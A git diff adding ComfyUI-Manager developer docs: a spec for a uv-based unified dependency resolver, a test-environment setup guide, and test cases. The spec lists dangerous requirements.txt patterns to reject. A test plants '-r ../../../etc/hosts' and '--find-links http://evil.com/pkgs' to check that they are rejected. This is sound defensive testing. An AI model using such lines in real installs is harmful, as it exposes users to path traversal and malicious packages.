+ComfyUI Manager currently installs each node pack's `requirements.txt` individually via `pip install`.
+This approach causes dependency conflicts where installing a new node pack can break previously installed node packs' dependencies.
+
+**Current flow:**
+```mermaid
+graph LR
+ A1[Install node pack A] --> A2[pip install A's deps] --> A3[Run install.py]
+ B1[Install node pack B] --> B2[pip install B's deps] --> B3[Run install.py]
+ B2 -.->|May break
A's deps| A2
+```
+
+### 1.2 Goal
+Implement a unified dependency installation module that uses `uv` to resolve all dependencies (installed node packs + new node packs) at once.
+
+**New flow (unified resolver mode):**
+```mermaid
+graph TD
+ subgraph "Install Time (immediate)"
+ A1[User installs node pack X] --> A2[Git clone / download]
+ A2 --> A3["Run X's install.py (if exists)"]
+ A3 --> A4["Skip per-node pip install
(deps deferred to restart)"]
+ end
+
+ subgraph "ComfyUI Restart (startup batch)"
+ B1[prestartup_script.py] --> B2[Collect ALL installed node packs' deps]
+ B2 --> B3["uv pip compile → pinned requirements.txt"]
+ B3 --> B4["uv pip install -r → Batch install"]
+ B4 --> B5[PIPFixer environment correction]
+ end
+```
+
+> **Terminology**: In this document, "lockfile" refers to the **pinned requirements.txt** generated by `uv pip compile`.
+> This is different from the `uv.lock` (TOML format) generated by `uv lock`. We use a pip-compatible workflow.
+
+### 1.3 Scope
+- Develop a new dedicated dependency resolution module
+- Opt-in activation from the existing install process
+- **Handles dependency resolution (deps install) only**. `install.py` execution is handled by existing logic
+
+---
+
+## 2. Constraints
+
+| Item | Description |
+|------|-------------|
+| **uv required** | Only operates in environments where `uv` is available |
+| **Independent of `use_uv` flag** | `use_unified_resolver` is separate from the existing `use_uv` flag. Even if `use_uv=False`, setting `use_unified_resolver=True` attempts resolver activation. Auto-fallback if uv is not installed |
+| **Pre-validated list** | Input node pack list is assumed to be pre-verified for mutual dependency compatibility |
+| **Backward compatibility** | Existing pip-based install process is fully preserved (fallback) |
+| **Blacklist/overrides bypassed** | In unified mode, `pip_blacklist`, `pip_overrides`, `pip_downgrade_blacklist` are NOT applied (empty values passed). Constructor interface is preserved for future extensibility. `uv pip compile` handles all conflict resolution natively. **[DEFERRED]** Reading actual values from `cm_global` at startup is deferred to a future version — v1 always passes empty values |
+| **Multiple custom_nodes paths** | Supports all paths returned by `folder_paths.get_folder_paths('custom_nodes')` |
+| **Scope of application** | Batch resolver runs at **module scope** in `prestartup_script.py` (unconditionally when enabled, independent of `install-scripts.txt` existence). The 2 `execute_install_script()` locations skip per-node pip install when unified mode is active (deps deferred to restart). `execute_lazy_install_script()` is also modified to skip per-node pip install in unified mode. Other install paths such as `install_manager_requirements()`, `pip_install()` are outside v1 scope (future extension) |
+| **Legacy module** | `comfyui_manager/legacy/manager_core.py` is excluded from modification. Legacy paths retain existing pip behavior |
+
+---
+
+## 3. Functional Requirements
+
+### FR-1: Node Pack List and Base Dependency Input
+
+**Input:**
+- Node pack list (fullpath list of installed + to-be-installed node packs)
+- Base dependencies (ComfyUI's `requirements.txt` and `manager_requirements.txt`)
+
+**Behavior:**
+- Validate each node pack path
+- Exclude disabled (`.disabled`) node packs
+ - Detection criteria: Existence of `custom_nodes/.disabled/{node_pack_name}` **directory**
+ - Existing mechanism: Disabling a node pack **moves** it from `custom_nodes/` to `custom_nodes/.disabled/` (does NOT create a `.disabled` file inside the node pack)
+ - At resolver input time, disabled node packs should already be absent from `custom_nodes/`, so normally they won't be in `node_pack_paths`
+ - Defensively exclude any node pack paths that are within the `.disabled` directory
+- Base dependencies are treated as constraints
+- Traverse all paths from `folder_paths.get_folder_paths('custom_nodes')`
+
+**`cm_global` runtime dependencies:**
+- `cm_global.pip_overrides`, `pip_blacklist`, `pip_downgrade_blacklist` are dynamically assigned during `prestartup_script.py` execution
+- In unified mode, these are **not applied** — empty values are passed to the resolver constructor
+- The constructor interface accepts these parameters for future extensibility (defaults to empty when `None`)
+
+### FR-2: Dependency List Extraction
+
+**Behavior:**
+- Parse `requirements.txt` from each node pack directory
+ - Encoding: Use `robust_readlines()` pattern (`chardet` detection, assumes UTF-8 if not installed)
+- Package name remapping (constructor accepts `overrides` dict — **empty in v1**, interface preserved for extensibility)
+- Blacklist package filtering (constructor accepts `blacklist` set — **empty in v1**, uv handles torch etc. natively)
+- Downgrade blacklist filtering (constructor accepts `downgrade_blacklist` list — **empty in v1**)
+- **Note**: In unified mode, `uv pip compile` resolves all version conflicts natively. The blacklist/overrides/downgrade_blacklist mechanisms from the existing pip flow are bypassed
+- Strip comments (`#`) and blank lines
+- **Input sanitization** (see below)
+- Separate handling of `--index-url` entries (see below)
+
+**Input sanitization:**
+- Requirements lines matching the following patterns are **rejected and logged** (security defense):
+ - `-r`, `--requirement` (recursive include → path traversal risk)
+ - `-e`, `--editable` (VCS/local path install → arbitrary code execution risk)
+ - `-c`, `--constraint` (external constraint file injection)
+ - `--find-links`, `-f` (external package source specification)
+ - `@ file://` (local file reference → path traversal risk)
+ - Package names containing path separators (`/`, `\`)
+- Allowed items: Package specs (`name>=version`), specs with `--index-url`, environment markers (containing `;`)
+- Rejected lines are recorded in the `skipped` list with reason
+
+**`--index-url` handling:**
+- Existing code (standalone function `execute_install_script()`) parses `package_name --index-url URL` format for special handling
+- **Note**: The class method `UnifiedManager.execute_install_script()` does NOT have this handling (asymmetric)
+- The unified resolver **unifies both paths** for consistent handling:
+ - Package spec → added to the general dependency list
+ - `--extra-index-url URL` → passed as `uv pip compile` argument
+- Separated index URLs are collected in `CollectedDeps.extra_index_urls`
+- **Credential redaction**: Authentication info (`user:pass@`) in index URLs is masked during logging
+
+**Duplicate handling strategy:**
+- No deduplication is performed directly
+- Different version specs of the same package are **all passed as-is** to uv
+- `uv pip compile` handles version resolution (uv determines the optimal version)
+
+**Output:**
+- Unified dependency list (tracked by source node pack)
+- Additional index URL list
+
+### FR-3: uv pip compile Execution
+
+**Behavior:**
+- Generate temporary requirements file from the collected dependency list
+- Execute `uv pip compile` to produce a pinned requirements.txt
+ - `--output-file` (required): Specify output file (outputs to stdout only if not specified)
+ - `--constraint`: Pass base dependencies as constraints
+ - `--python`: Current Python interpreter path
+ - `--extra-index-url`: Additional index URLs collected from FR-2 (multiple allowed)
+- Resolve for the current platform (platform-specific results)
+
+**Error handling:**
+- Return conflict package report when resolution fails
+- Timeout handling (300s): Explicitly catch `subprocess.TimeoutExpired`, terminate child process, then fallback
+- Lockfile output file existence verification: Confirm file was actually created even when `returncode == 0`
+- Temp file cleanup: Guaranteed in `finally` block. Includes stale temp file cleanup logic at next execution for abnormal termination (SIGKILL) scenarios
+
+**Output:**
+- pinned requirements.txt (file with all packages pinned to exact versions)
+
+### FR-4: Pinned Requirements-based Dependency Installation
+
+**Behavior:**
+- Execute `uv pip install -r `
+ - **Do NOT use `uv pip sync`**: sync deletes packages not in the lockfile, risking removal of torch, ComfyUI's own dependencies, etc.
+- Already-installed packages at the same version are skipped (default uv behavior)
+- Log installation results
+
+**Error handling:**
+- `uv pip install -r` is an **atomic operation** (all-or-nothing)
+- On total failure: Parse stderr for failure cause report → fallback to existing pip
+- **No partial failure report** (not possible due to uv's behavior)
+- `InstallResult`'s `installed`/`skipped` fields are populated by parsing uv stdout; `stderr` records failure cause (no separate `failed` field needed due to atomic model)
+
+### FR-5: Post-install Environment Correction
+
+**Behavior:**
+- Call `PIPFixer.fix_broken()` for environment integrity correction
+ - Restore torch version (when change detected)
+ - Fix OpenCV conflicts
+ - Restore comfyui-frontend-package
+ - Restore packages based on `pip_auto_fix.list`
+- **This step is already performed in the existing `execute_install_script()` flow, so the unified resolver itself doesn't need to call it**
+ - However, an optional call option is provided for cases where the resolver is invoked independently outside the existing flow
+
+### FR-6: install.py Execution (Existing Flow Maintained)
+
+**Behavior:**
+- The unified resolver handles deps installation **at startup time only**
+- `install.py` execution is handled by the existing `execute_install_script()` flow and runs **immediately** at install time
+- Deps are deferred to startup batch resolution; `install.py` runs without waiting for deps
+
+**Control flow specification (unified mode active):**
+- `execute_install_script()`: **skip** the `requirements.txt`-based individual pip install loop entirely (deps will be resolved at next restart)
+- `install.py` execution runs **immediately** as before
+- At next ComfyUI restart: `prestartup_script.py` runs the unified resolver for all installed node packs
+
+**Control flow specification (unified mode inactive / fallback):**
+- Existing pip install loop runs as-is (no change)
+- `install.py` execution runs **immediately** as before
+
+### FR-7: Startup Batch Resolution
+
+**Behavior:**
+- When `use_unified_resolver=True`, **all dependency resolution is deferred to ComfyUI startup**
+- At install time: node pack itself is installed (git clone, etc.) and `install.py` runs immediately, but `requirements.txt` deps are **not** installed per-request
+- At startup time: `prestartup_script.py` runs the unified resolver once for all installed node packs
+
+**Startup execution flow (in `prestartup_script.py`):**
+1. At **module scope** (before `execute_startup_script()` gate): check `manager_util.use_unified_resolver` flag
+2. If enabled: collect all installed node pack paths, read base requirements from `comfy_path`
+3. Create `UnifiedDepResolver` with empty blacklist/overrides/downgrade_blacklist (uv handles resolution natively)
+4. Call `resolve_and_install()` — collects all deps → compile → install in one batch
+5. On success: set `_unified_resolver_succeeded = True`, skip per-node pip in `execute_lazy_install_script()`
+6. On failure: log warning, `execute_lazy_install_script()` falls back to existing per-node pip install
+7. **Note**: Runs unconditionally when enabled, independent of `install-scripts.txt` existence
+
+**`execute_install_script()` behavior in unified mode:**
+- Skip the `requirements.txt` pip install loop entirely (deps will be handled at restart)
+- `install.py` execution still runs immediately
+
+**`execute_lazy_install_script()` behavior in unified mode:**
+- Skip the `requirements.txt` pip install loop (already handled by startup batch resolver)
+- `install.py` execution still runs
+
+**Windows-specific behavior:**
+- Windows lazy install path also benefits from startup batch resolution
+- `try_install_script()` defers to `reserve_script()` as before for non-`instant_execution=True` installs
+
+---
+
+## 4. Non-functional Requirements
+
+| Item | Requirement |
+|------|-------------|
+| **Performance** | Equal to or faster than existing individual installs |
+| **Stability** | Must not break the existing environment |
+| **Logging** | Log progress and results at each step (details below) |
+| **Error recovery** | Fallback to existing pip method on failure |
+| **Testing** | Unit test coverage above 80% |
+| **Security** | requirements.txt input sanitization (see FR-2), credential log redaction, subprocess list-form invocation |
+| **Concurrency** | Prevent lockfile path collisions on concurrent install requests. Use process/thread-unique suffixes or temp directories |
+| **Temp files** | Guarantee temp file cleanup on both normal and abnormal termination. Clean stale files on next execution |
+
+### Logging Requirements
+
+| Step | Log Level | Content |
+|------|-----------|---------|
+| Resolver start | `INFO` | Node pack count, total dependency count, mode (unified/pip) |
+| Dependency collection | `INFO` | Collection summary (collected N, skipped N, sources N) |
+| Dependency collection | `DEBUG` | Per-package collection/skip/remap details |
+| `--index-url` detection | `INFO` | Detected additional index URL list |
+| uv compile start | `INFO` | Execution command (excluding sensitive info) |
+| uv compile success | `INFO` | Pinned package count, elapsed time |
+| uv compile failure | `WARNING` | Conflict details, fallback transition notice |
+| Install start | `INFO` | Number of packages to install |
+| Install success | `INFO` | Installed/skipped/failed count summary, elapsed time |
+| Install failure | `WARNING` | Failed package list, fallback transition notice |
+| Fallback transition | `WARNING` | Transition reason, original error message |
+| Overall completion | `INFO` | Final result summary (success/fallback/failure) |
+
+> **Log prefix**: All logs use `[UnifiedDepResolver]` prefix to distinguish from existing pip install logs
+
+---
+
+## 5. Usage Scenarios
+
+### Scenario 1: Single Node Pack Installation (unified mode)
+```
+User requests installation of node pack X
+→ Git clone / download node pack X
+→ Run X's install.py (if exists) — immediately
+→ Skip per-node pip install (deps deferred)
+→ User restarts ComfyUI
+→ prestartup_script.py: Collect deps from ALL installed node packs (A,B,C,X)
+→ uv pip compile resolves fully compatible versions
+→ uv pip install -r for batch installation
+→ PIPFixer environment correction
+```
+
+### Scenario 2: Multi Node Pack Batch Installation (unified mode)
+```
+User requests installation of node packs X, Y, Z
+→ Each node pack: git clone + install.py — immediately
+→ Per-node pip install skipped for all
+→ User restarts ComfyUI
+→ prestartup_script.py: Collect deps from ALL installed node packs (including X,Y,Z)
+→ Single uv pip compile → single uv pip install -r
+→ PIPFixer environment correction
+```
+
+### Scenario 3: Dependency Resolution Failure (Edge Case)
+```
+Even pre-validated lists may fail due to uv version differences or platform issues
+→ uv pip compile failure → return conflict report
+→ Display conflict details to user
+→ Auto-execute existing pip fallback
+```
+
+### Scenario 4: uv Not Installed
+```
+uv unavailable detected → auto-fallback to existing pip method
+→ Display uv installation recommendation to user
+```
+
+### Scenario 5: Windows Lazy Installation (unified mode)
+```
+Node pack installation requested on Windows
+→ Node pack install deferred to startup (existing lazy mechanism)
+→ On next ComfyUI startup: unified resolver runs first (batch deps)
+→ execute_lazy_install_script() skips per-node pip (already resolved)
+→ install.py still runs per node pack
+```
+
+### Scenario 6: Malicious/Non-standard requirements.txt
+```
+Node pack's requirements.txt contains `-r ../../../etc/hosts` or `-e git+https://...`
+→ Sanitization filter rejects the line
+→ Log rejection reason and continue processing remaining valid packages
+→ Notify user of rejected item count
+```
+
+### Scenario 7: Concurrent Install Requests (unified mode)
+```
+User requests installation of node packs A and B nearly simultaneously from UI
+→ Each request: git clone + install.py immediately, deps skipped
+→ On restart: single unified resolver run handles both A and B deps together
+→ No concurrency issue (single batch at startup)
+```
+
+---
+
+## 6. Success Metrics
+
+| Metric | Target |
+|--------|--------|
+| Dependency conflict reduction | 90%+ reduction compared to current |
+| Install success rate | 99%+ (for compatibility-verified lists) |
+| Performance | Equal to or better than existing individual installs |
+| Adoption rate | 50%+ of eligible users |
+
+---
+
+## 7. Future Extensions
+
+- ~~**`cm_global` integration** [DONE]: `cm_cli uv-compile` and `cm_cli install --uv-compile` pass real `cm_global` values. Startup path (`prestartup_script.py`) still passes empty by design~~
+- Lockfile caching: Reuse for identical node pack configurations
+- Pre-install dependency conflict validation API: Check compatibility before installation
+- Dependency tree visualization: Display dependency relationships to users
+- `uv lock`-based cross-platform lockfile support (TOML format)
+- `install_manager_requirements()` integration: Resolve manager's own dependencies through unified resolver
+- `pip_install()` integration: Route UI direct installs through unified resolver
+- Legacy module (`comfyui_manager/legacy/`) unified resolver support
+
+---
+
+## Appendix A: Existing Code Install Path Mapping
+
+> This section is reference material to clarify the unified resolver's scope of application.
+
+| Install Path | Location | v1 Applied | Notes |
+|-------------|----------|------------|-------|
+| `UnifiedManager.execute_install_script()` | `glob/manager_core.py` (method) | ✅ Yes | Skips per-node pip in unified mode (deps deferred to restart) |
+| Standalone `execute_install_script()` | `glob/manager_core.py` (function) | ✅ Yes | Skips per-node pip in unified mode (deps deferred to restart) |
+| `execute_lazy_install_script()` | `prestartup_script.py` | ✅ Yes | Skips per-node pip in unified mode (already batch-resolved) |
+| Startup batch resolver | `prestartup_script.py` | ✅ Yes | **New**: Runs unified resolver once at startup for all node packs |
+| `install_manager_requirements()` | `glob/manager_core.py` | ❌ No | Manager's own deps |
+| `pip_install()` | `glob/manager_core.py` | ❌ No | UI direct install |
+| Legacy `execute_install_script()` (2 locations) | `legacy/manager_core.py` | ❌ No | Legacy paths |
+| `cm_cli uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Standalone CLI batch resolution (with `cm_global` values) |
+| `cm_cli install --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped, batch resolution after all installs |
diff --git a/docs/dev/TEST-environment-setup.md b/docs/dev/TEST-environment-setup.md
new file mode 100644
index 00000000..56dc364d
--- /dev/null
+++ b/docs/dev/TEST-environment-setup.md
@@ -0,0 +1,194 @@
+# Test Environment Setup
+
+Procedures for setting up a ComfyUI environment with ComfyUI-Manager installed for functional testing.
+
+## Automated Setup (Recommended)
+
+Three shell scripts in `tests/e2e/scripts/` automate the entire lifecycle:
+
+```bash
+# 1. Setup: clone ComfyUI, create venv, install deps, symlink Manager
+E2E_ROOT=/tmp/e2e_test MANAGER_ROOT=/path/to/comfyui-manager-draft4 \
+ bash tests/e2e/scripts/setup_e2e_env.sh
+
+# 2. Start: launches ComfyUI in background, blocks until ready
+E2E_ROOT=/tmp/e2e_test bash tests/e2e/scripts/start_comfyui.sh
+
+# 3. Stop: graceful SIGTERM → SIGKILL shutdown
+E2E_ROOT=/tmp/e2e_test bash tests/e2e/scripts/stop_comfyui.sh
+
+# 4. Cleanup
+rm -rf /tmp/e2e_test
+```
+
+### Script Details
+
+| Script | Purpose | Input | Output |
+|--------|---------|-------|--------|
+| `setup_e2e_env.sh` | Full environment setup (8 steps) | `E2E_ROOT`, `MANAGER_ROOT`, `COMFYUI_BRANCH` (default: master), `PYTHON` (default: python3) | `E2E_ROOT=` on last line |
+| `start_comfyui.sh` | Foreground-blocking launcher | `E2E_ROOT`, `PORT` (default: 8199), `TIMEOUT` (default: 120s) | `COMFYUI_PID= PORT=` |
+| `stop_comfyui.sh` | Graceful shutdown | `E2E_ROOT`, `PORT` (default: 8199) | — |
+
+**Idempotent**: `setup_e2e_env.sh` checks for a `.e2e_setup_complete` marker file and skips setup if the environment already exists.
+
+**Blocking mechanism**: `start_comfyui.sh` uses `tail -n +1 -f | grep -q -m1 'To see the GUI'` to block until ComfyUI is ready. No polling loop needed.
+
+---
+
+## Prerequisites
+
+- Python 3.9+
+- Git
+- `uv` (install via `pip install uv` or [standalone](https://docs.astral.sh/uv/getting-started/installation/))
+
+## Manual Setup (Reference)
+
+For understanding or debugging, the manual steps are documented below. The automated scripts execute these same steps.
+
+### 1. ComfyUI Clone
+
+```bash
+COMFY_ROOT=$(mktemp -d)/ComfyUI
+git clone https://github.com/comfyanonymous/ComfyUI.git "$COMFY_ROOT"
+cd "$COMFY_ROOT"
+```
+
+### 2. Virtual Environment
+
+```bash
+cd "$COMFY_ROOT"
+uv venv .venv
+source .venv/bin/activate # Linux/macOS
+# .venv\Scripts\activate # Windows
+```
+
+### 3. ComfyUI Dependencies
+
+```bash
+# GPU (CUDA)
+uv pip install -r requirements.txt --extra-index-url https://download.pytorch.org/whl/cu121
+
+# CPU only (lightweight, for functional testing)
+uv pip install -r requirements.txt --extra-index-url https://download.pytorch.org/whl/cpu
+```
+
+### 4. ComfyUI-Manager Install (Development)
+
+```bash
+# MANAGER_ROOT = comfyui-manager-draft4 repository root
+MANAGER_ROOT=/path/to/comfyui-manager-draft4
+
+# Editable install from current source
+uv pip install -e "$MANAGER_ROOT"
+```
+
+> **Note**: Editable mode (`-e`) reflects code changes without reinstalling.
+> For production-like testing, use `uv pip install "$MANAGER_ROOT"` (non-editable).
+
+### 5. Symlink Manager into custom_nodes
+
+```bash
+ln -s "$MANAGER_ROOT" "$COMFY_ROOT/custom_nodes/ComfyUI-Manager"
+```
+
+### 6. Write config.ini
+
+```bash
+mkdir -p "$COMFY_ROOT/user/__manager"
+cat > "$COMFY_ROOT/user/__manager/config.ini" << 'EOF'
+[default]
+use_uv = true
+use_unified_resolver = true
+EOF
+```
+
+> **IMPORTANT**: The config path is `$COMFY_ROOT/user/__manager/config.ini`, resolved by `folder_paths.get_system_user_directory("manager")`. It is NOT inside the symlinked Manager directory.
+
+### 7. HOME Isolation
+
+```bash
+export HOME=/tmp/e2e_home
+mkdir -p "$HOME/.config" "$HOME/.local/share"
+```
+
+### 8. ComfyUI Launch
+
+```bash
+cd "$COMFY_ROOT"
+PYTHONUNBUFFERED=1 python main.py --enable-manager --cpu --port 8199
+```
+
+| Flag | Purpose |
+|------|---------|
+| `--enable-manager` | Enable ComfyUI-Manager (disabled by default) |
+| `--cpu` | Run without GPU (for functional testing) |
+| `--port 8199` | Use non-default port to avoid conflicts |
+| `--enable-manager-legacy-ui` | Enable legacy UI (optional) |
+| `--listen` | Allow remote connections (optional) |
+
+### Key Directories
+
+| Directory | Path | Description |
+|-----------|------|-------------|
+| ComfyUI root | `$COMFY_ROOT/` | ComfyUI installation root |
+| Manager data | `$COMFY_ROOT/user/__manager/` | Manager config, startup scripts, snapshots |
+| Config file | `$COMFY_ROOT/user/__manager/config.ini` | Manager settings (`use_uv`, `use_unified_resolver`, etc.) |
+| custom_nodes | `$COMFY_ROOT/custom_nodes/` | Installed node packs |
+
+> The Manager data path is resolved via `folder_paths.get_system_user_directory("manager")`.
+> Printed at startup: `** ComfyUI-Manager config path: /config.ini`
+
+### Startup Sequence
+
+When Manager loads successfully, the following log lines appear:
+
+```
+[PRE] ComfyUI-Manager # prestartup_script.py executed
+[START] ComfyUI-Manager # manager_server.py loaded
+```
+
+The `Blocked by policy` message for Manager in custom_nodes is **expected** — `should_be_disabled()` in `comfyui_manager/__init__.py` prevents legacy double-loading when Manager is already pip-installed.
+
+---
+
+## Caveats & Known Issues
+
+### PYTHONPATH for `comfy` imports
+
+ComfyUI's `comfy` package is a **local package** inside the ComfyUI directory — it is NOT pip-installed. Any code that imports from `comfy` (including `comfyui_manager.__init__`) requires `PYTHONPATH` to include the ComfyUI directory:
+
+```bash
+PYTHONPATH="$COMFY_ROOT" python -c "import comfy"
+PYTHONPATH="$COMFY_ROOT" python -c "import comfyui_manager"
+```
+
+The automated scripts handle this via `PYTHONPATH` in verification checks and the ComfyUI process inherits it implicitly by running from the ComfyUI directory.
+
+### config.ini path
+
+The config file must be at `$COMFY_ROOT/user/__manager/config.ini`, **NOT** inside the Manager symlink directory. This is resolved by `folder_paths.get_system_user_directory("manager")` at `prestartup_script.py:65-73`.
+
+### Manager v4 endpoint prefix
+
+All Manager endpoints use the `/v2/` prefix (e.g., `/v2/manager/queue/status`, `/v2/snapshot/get_current`). Paths without the prefix will return 404.
+
+### `Blocked by policy` is expected
+
+When Manager detects that it's loaded as a custom_node but is already pip-installed, it prints `Blocked by policy` and skips legacy loading. This is intentional behavior in `comfyui_manager/__init__.py:39-51`.
+
+### Bash `((var++))` trap
+
+Under `set -e`, `((0++))` evaluates the pre-increment value (0), and `(( 0 ))` returns exit code 1, killing the script. Use `var=$((var + 1))` instead.
+
+### `git+https://` URLs in requirements.txt
+
+Some node packs (e.g., Impact Pack's SAM2 dependency) use `git+https://github.com/...` URLs. The unified resolver correctly rejects these with "rejected path separator" — they must be installed separately.
+
+---
+
+## Cleanup
+
+```bash
+deactivate
+rm -rf "$COMFY_ROOT"
+```
diff --git a/docs/dev/TEST-unified-dep-resolver.md b/docs/dev/TEST-unified-dep-resolver.md
new file mode 100644
index 00000000..eb90a1de
--- /dev/null
+++ b/docs/dev/TEST-unified-dep-resolver.md
@@ -0,0 +1,788 @@
+# Test Cases: Unified Dependency Resolver
+
+See [TEST-environment-setup.md](TEST-environment-setup.md) for environment setup.
+
+## Enabling the Resolver
+
+Add the following to `config.ini` (in the Manager data directory):
+
+```ini
+[default]
+use_unified_resolver = true
+```
+
+> Config path: `$COMFY_ROOT/user/__manager/config.ini`
+> Also printed at startup: `** ComfyUI-Manager config path: /config.ini`
+
+**Log visibility note**: `[UnifiedDepResolver]` messages are emitted via Python's `logging` module (INFO and WARNING levels), not `print()`. Ensure the logging level is set to INFO or lower. ComfyUI defaults typically show these, but if messages are missing, check that the root logger or the `ComfyUI-Manager` logger is not set above INFO.
+
+## API Reference (for Runtime Tests)
+
+Node pack installation at runtime uses the task queue API:
+
+```
+POST http://localhost:8199/v2/manager/queue/task
+Content-Type: application/json
+```
+
+> **Port**: E2E tests use port 8199 to avoid conflicts with running ComfyUI instances. Replace with your actual port if different.
+
+**Payload** (`QueueTaskItem`):
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `ui_id` | string | Unique task identifier (any string) |
+| `client_id` | string | Client identifier (any string) |
+| `kind` | `OperationType` enum | `"install"`, `"uninstall"`, `"update"`, `"update-comfyui"`, `"fix"`, `"disable"`, `"enable"`, `"install-model"` |
+| `params` | object | Operation-specific parameters (see below) |
+
+**Install params** (`InstallPackParams`):
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `id` | string | CNR node pack ID (e.g., `"comfyui-impact-pack"`) or `"author/repo"` |
+| `version` | string | Required by model. Set to same value as `selected_version`. |
+| `selected_version` | string | **Controls install target**: `"latest"`, `"nightly"`, or specific semver |
+| `mode` | string | `"remote"`, `"local"`, or `"cache"` |
+| `channel` | string | `"default"`, `"recent"`, `"legacy"`, etc. |
+
+> **Note**: `cm_cli` supports unified resolver via `cm_cli uv-compile` (standalone) and
+> `cm_cli install --uv-compile` (install-time batch resolution). Without `--uv-compile`,
+> installs use per-node pip via `legacy/manager_core.py`.
+
+---
+
+## Out of Scope (Deferred)
+
+The following are intentionally **not tested** in this version:
+
+- **cm_global integration (startup path only)**: At startup (`prestartup_script.py`), `pip_blacklist`, `pip_overrides`, `pip_downgrade_blacklist` are passed as empty defaults to the resolver. Integration with cm_global at startup is deferred to a future commit. Do not file defects for blacklist/override/downgrade behavior in startup unified mode. Note: `cm_cli uv-compile` and `cm_cli install --uv-compile` already pass real `cm_global` values (see PRD Future Extensions).
+- **cm_cli per-node install (without --uv-compile)**: `cm_cli install` without `--uv-compile` imports from `legacy/manager_core.py` and uses per-node pip install. This is by design — use `cm_cli install --uv-compile` or `cm_cli uv-compile` for batch resolution.
+- **Standalone `execute_install_script()`** (`glob/manager_core.py` ~line 1881): Has a unified resolver guard (`manager_util.use_unified_resolver`), identical to the class method guard. Reachable from the glob API via `update-comfyui` tasks (`update_path()` / `update_to_stable_comfyui()`), git-based node pack updates (`git_repo_update_check_with()` / `fetch_or_pull_git_repo()`), and gitclone operations. Also called from CLI and legacy server paths. The guard behaves identically to the class method at all call sites; testing it separately adds no coverage beyond TC-14 Path 1.
+
+## CLI E2E Tests (`cm_cli uv-compile`)
+
+These tests do **not** require ComfyUI server. Only a venv with `COMFYUI_PATH` set and
+the E2E environment from `setup_e2e_env.sh` are needed.
+
+**Common setup**:
+```bash
+source tests/e2e/scripts/setup_e2e_env.sh # → E2E_ROOT=...
+export COMFYUI_PATH="$E2E_ROOT/comfyui"
+VENV_PY="$E2E_ROOT/venv/bin/python"
+```
+
+---
+
+### TC-CLI-1: Normal Batch Resolution [P0]
+
+**Steps**:
+1. Create a test node pack with a simple dependency:
+```bash
+mkdir -p "$COMFYUI_PATH/custom_nodes/test_cli_pack"
+echo "chardet>=5.0" > "$COMFYUI_PATH/custom_nodes/test_cli_pack/requirements.txt"
+```
+2. Run:
+```bash
+$VENV_PY -m cm_cli uv-compile
+```
+
+**Verify**:
+- Exit code: 0
+- Output contains: `Resolved N deps from M source(s)`
+- `chardet` is importable: `$VENV_PY -c "import chardet"`
+
+**Cleanup**: `rm -rf "$COMFYUI_PATH/custom_nodes/test_cli_pack"`
+
+---
+
+### TC-CLI-2: No Custom Node Packs [P1]
+
+**Steps**:
+1. Ensure `custom_nodes/` contains no node packs (only symlinks like `ComfyUI-Manager`
+ or empty dirs may remain)
+2. Run:
+```bash
+$VENV_PY -m cm_cli uv-compile
+```
+
+**Verify**:
+- Exit code: 0
+- Output contains: `No custom node packs found` OR `Resolution complete (no deps needed)`
+
+---
+
+### TC-CLI-3: uv Unavailable [P0]
+
+**Steps**:
+1. Create a temporary venv **without** uv:
+```bash
+python3 -m venv /tmp/no_uv_venv
+/tmp/no_uv_venv/bin/pip install comfyui-manager # or install from local
+```
+2. Ensure no standalone `uv` in PATH:
+```bash
+PATH="/tmp/no_uv_venv/bin" COMFYUI_PATH="$COMFYUI_PATH" \
+ /tmp/no_uv_venv/bin/python -m cm_cli uv-compile
+```
+
+**Verify**:
+- Exit code: 1
+- Output contains: `uv is not available`
+
+**Cleanup**: `rm -rf /tmp/no_uv_venv`
+
+---
+
+### TC-CLI-4: Conflicting Dependencies [P0]
+
+**Steps**:
+1. Create two node packs with conflicting pinned versions:
+```bash
+mkdir -p "$COMFYUI_PATH/custom_nodes/conflict_a"
+echo "numpy==1.24.0" > "$COMFYUI_PATH/custom_nodes/conflict_a/requirements.txt"
+mkdir -p "$COMFYUI_PATH/custom_nodes/conflict_b"
+echo "numpy==1.26.0" > "$COMFYUI_PATH/custom_nodes/conflict_b/requirements.txt"
+```
+2. Run:
+```bash
+$VENV_PY -m cm_cli uv-compile
+```
+
+**Verify**:
+- Exit code: 1
+- Output contains: `Resolution failed`
+
+**Cleanup**: `rm -rf "$COMFYUI_PATH/custom_nodes/conflict_a" "$COMFYUI_PATH/custom_nodes/conflict_b"`
+
+---
+
+### TC-CLI-5: Dangerous Pattern Skip [P0]
+
+**Steps**:
+1. Create a node pack mixing valid and dangerous lines:
+```bash
+mkdir -p "$COMFYUI_PATH/custom_nodes/test_dangerous"
+cat > "$COMFYUI_PATH/custom_nodes/test_dangerous/requirements.txt" << 'EOF'
+chardet>=5.0
+-r ../../../etc/hosts
+--find-links http://evil.com/pkgs
+requests>=2.28
+EOF
+```
+2. Run:
+```bash
+$VENV_PY -m cm_cli uv-compile
+```
+
+**Verify**:
+- Exit code: 0
+- Output contains: `Resolved 2 deps` (chardet + requests, dangerous lines skipped)
+- `chardet` and `requests` are importable
+- Log contains: `rejected dangerous line` for the `-r` and `--find-links` lines
+
+**Cleanup**: `rm -rf "$COMFYUI_PATH/custom_nodes/test_dangerous"`
+
+---
+
+### TC-CLI-6: install --uv-compile Single Pack [P0]
+
+**Steps**:
+1. In clean E2E environment, install a single node pack:
+```bash
+$VENV_PY -m cm_cli install comfyui-impact-pack --uv-compile --mode remote
+```
+
+**Verify**:
+- Exit code: 0
+- Per-node pip install does NOT run (no `Install: pip packages` in output)
+- `install.py` still executes
+- Output contains: `Resolved N deps from M source(s)`
+- Impact Pack dependencies are importable: `cv2`, `skimage`, `dill`, `scipy`, `matplotlib`
+
+---
+
+### TC-CLI-7: install --uv-compile Multiple Packs [P0]
+
+**Steps**:
+1. After TC-CLI-6 (or with impact-pack already installed), install two more packs at once:
+```bash
+$VENV_PY -m cm_cli install comfyui-impact-subpack comfyui-inspire-pack --uv-compile --mode remote
+```
+
+**Verify**:
+- Exit code: 0
+- Both packs installed: `[INSTALLED] comfyui-impact-subpack`, `[INSTALLED] comfyui-inspire-pack`
+- Batch resolution runs once (not twice) after all installs complete
+- Resolves deps for **all** installed packs (impact + subpack + inspire + manager)
+- New dependencies importable: `cachetools`, `webcolors`, `piexif`
